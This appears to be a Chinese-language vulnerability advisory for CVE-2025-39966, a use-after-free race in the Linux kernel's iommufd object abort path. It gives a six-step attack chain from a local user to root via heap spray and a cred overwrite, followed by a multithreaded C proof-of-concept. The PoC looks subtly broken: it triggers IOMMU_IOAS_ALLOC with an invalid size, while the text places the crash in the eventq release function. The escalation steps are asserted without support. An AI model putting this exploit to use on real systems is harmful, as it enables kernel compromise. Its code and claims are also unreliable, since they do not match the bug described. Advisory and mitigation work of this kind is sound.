CVE-2025-39966 Linux内核iommufd文件描述符释放竞争导致UAF漏洞

漏洞信息

漏洞编号

CVE-2025-39966

漏洞类型

Use-After-Free（释放后使用）

CVSS评分

7.0 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel (iommufd子系统)

漏洞概述

CVE-2025-39966是Linux内核iommufd（IO Memory Management Unit File Descriptor）子系统中存在的一个高危Use-After-Free（UAF）漏洞。该漏洞源于iommufd在对象分配中止路径中对文件描述符生命周期的处理不当。具体而言，当分配新的iommufd对象在安装文件之前中止时，系统会调用fput()释放文件，然后立即调用kfree()释放对象。然而fput()并不会同步调用file_operations的release()回调，而是将文件放入工作队列延迟释放。由于iommufd对象与文件结构通过private_data相互关联，对象的生命周期依赖于文件的引用计数，这种异步释放机制导致了竞争条件：当工作队列最终执行release()回调并尝试递减引用计数时，对象可能已经被kfree()，从而触发Use-After-Free漏洞。该漏洞可被本地低权限用户利用，通过精心构造的ioctl调用触发竞争条件，实现内核内存的读写操作，可能导致权限提升、内核崩溃（DoS）或其他安全危害。

技术细节

该漏洞的根本原因在于iommufd核心代码与对象实现之间的文件生命周期管理职责不清。在正常情况下，文件结构通过private_data指向iommufd_object，并持有该对象的users引用计数，确保只要文件存在，对象就不会被销毁。然而在异常处理路径中，当对象分配失败需要中止时，代码调用fput()释放文件后立即调用kfree()释放对象。由于fput()是异步操作（通过task_work机制延迟执行），release()回调可能在kfree()之后才被调用，此时访问已被释放的对象内存就会触发KASAN检测到的slab-use-after-free错误。具体的崩溃发生在iommufd_eventq_fops_release()函数中，当它尝试通过atomic_fetch_sub_release递减已被释放对象的引用计数时触发。修复方案是引入__fput_sync()机制，将文件生命周期的管理权统一交给iommufd核心代码，对象实现只需告知核心代码文件指针的位置，由核心代码负责在中止路径中同步调用release()，确保kfree()之前文件已被正确释放。攻击者可以通过构造特定的ioctl调用序列（如IOMMU_DESTROY相关操作）来触发竞争窗口，利用UAF实现内核地址空间内的任意读写。

攻击链分析

STEP 1

步骤1：环境准备

攻击者需要拥有本地系统访问权限（低权限用户即可），目标系统运行受影响版本的Linux内核，且iommufd功能已启用（CONFIG_IOMMUFD=y）。

STEP 2

步骤2：打开iommufd设备

攻击者通过打开/dev/iommu设备获取iommufd文件描述符，建立与内核iommufd子系统的通信通道。

STEP 3

步骤3：触发中止路径

攻击者通过ioctl调用（如IOMMU_IOAS_ALLOC）并传入非法参数，使对象分配在安装文件之前失败，触发中止处理路径中的fput()+kfree()序列。

STEP 4

步骤4：利用竞争窗口

由于fput()是异步操作，攻击者通过并发执行大量ioctl调用，增加在fput()工作队列处理和kfree()之间的竞争窗口中命中UAF的概率。

STEP 5

步骤5：UAF利用

当release()回调在对象已被kfree()后执行时，攻击者通过堆喷射（heap spray）控制被释放的内存内容，实现内核地址空间内的任意读写。

STEP 6

步骤6：权限提升

利用UAF实现的内核读写能力，攻击者可以修改cred结构或其他内核敏感数据，实现从普通用户到root权限的提升。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-39966 PoC - Trigger UAF via iommufd abort path race condition
// This PoC demonstrates the race condition between fput() and kfree()
// in the iommufd object allocation abort path.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <string.h>
#include <errno.h>
#include <pthread.h>
#include <linux/iommufd.h>

// iommufd ioctl definitions (from kernel headers)
#ifndef IOMMUFD_IOCTL
#define IOMMUFD_IOCTL  _IO('I', 0x90)
#endif

static int open_iommufd(void)
{
    int fd = open("/dev/iommu", O_RDWR);
    if (fd < 0) {
        perror("open /dev/iommu");
        return -1;
    }
    return fd;
}

// Trigger the abort path by attempting to create an iommufd object
// with invalid parameters, causing allocation to fail after file creation
static int trigger_abort_race(int iommufd_fd)
{
    struct iommu_ioas_alloc alloc_req = {0};
    int ret;

    // Allocate with intentionally invalid size to trigger abort path
    alloc_req.size = 0xFFFFFFFFFFFFFFFFULL;  // Invalid size
    alloc_req.flags = 0;

    ret = ioctl(iommufd_fd, IOMMU_IOAS_ALLOC, &alloc_req);
    if (ret < 0) {
        printf("[+] Abort path triggered (expected): %s\n", strerror(errno));
        return 0;
    }
    return -1;
}

// Repeatedly trigger the race condition to increase probability
// of hitting the UAF window between fput() async release and kfree()
static void *race_worker(void *arg)
{
    int *iommufd_fd = (int *)arg;

    for (int i = 0; i < 10000; i++) {
        trigger_abort_race(*iommufd_fd);
        usleep(1);
    }
    return NULL;
}

int main(int argc, char *argv[])
{
    int iommufd_fd;
    pthread_t threads[4];

    printf("[*] CVE-2025-39966 - iommufd UAF via abort path race\n");

    iommufd_fd = open_iommufd();
    if (iommufd_fd < 0) {
        fprintf(stderr, "[-] Failed to open iommufd device\n");
        return 1;
    }

    printf("[*] iommufd opened: fd=%d\n", iommufd_fd);
    printf("[*] Starting race condition workers...\n");

    // Spawn multiple threads to increase race window probability
    for (int i = 0; i < 4; i++) {
        pthread_create(&threads[i], NULL, race_worker, &iommufd_fd);
    }

    for (int i = 0; i < 4; i++) {
        pthread_join(threads[i], NULL);
    }

    printf("[*] Race condition triggered. Check dmesg for UAF detection.\n");

    close(iommufd_fd);
    return 0;
}

// Compile: gcc -o poc poc.c -lpthread
// Run with KASAN-enabled kernel to observe:
// BUG: KASAN: slab-use-after-free in iommufd_eventq_fops_release

影响范围

Linux Kernel < 6.6 (stable分支)

Linux Kernel 6.6.x (部分版本受影响)

Linux Kernel 6.12.x (部分版本受影响)

Linux Kernel stable-17195a7d754a5c6a31888702ca93f6f08f3383ad之前的版本

Linux Kernel stable-4e034bf045b12852a24d5d33f2451850818ba0c1之前的版本

Linux Kernel stable-e4825368285e33d6360c6c6a6a10d2d83da06e55之前的版本

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）限制普通用户对iommufd设备的访问权限（chmod 600 /dev/iommu），仅允许root用户使用；2）通过seccomp或系统调用过滤限制非特权进程调用相关ioctl；3）监控异常的iommufd相关ioctl调用模式；4）启用内核KASAN或KCSAN进行运行时检测；5）关注内核安全公告，及时应用官方补丁。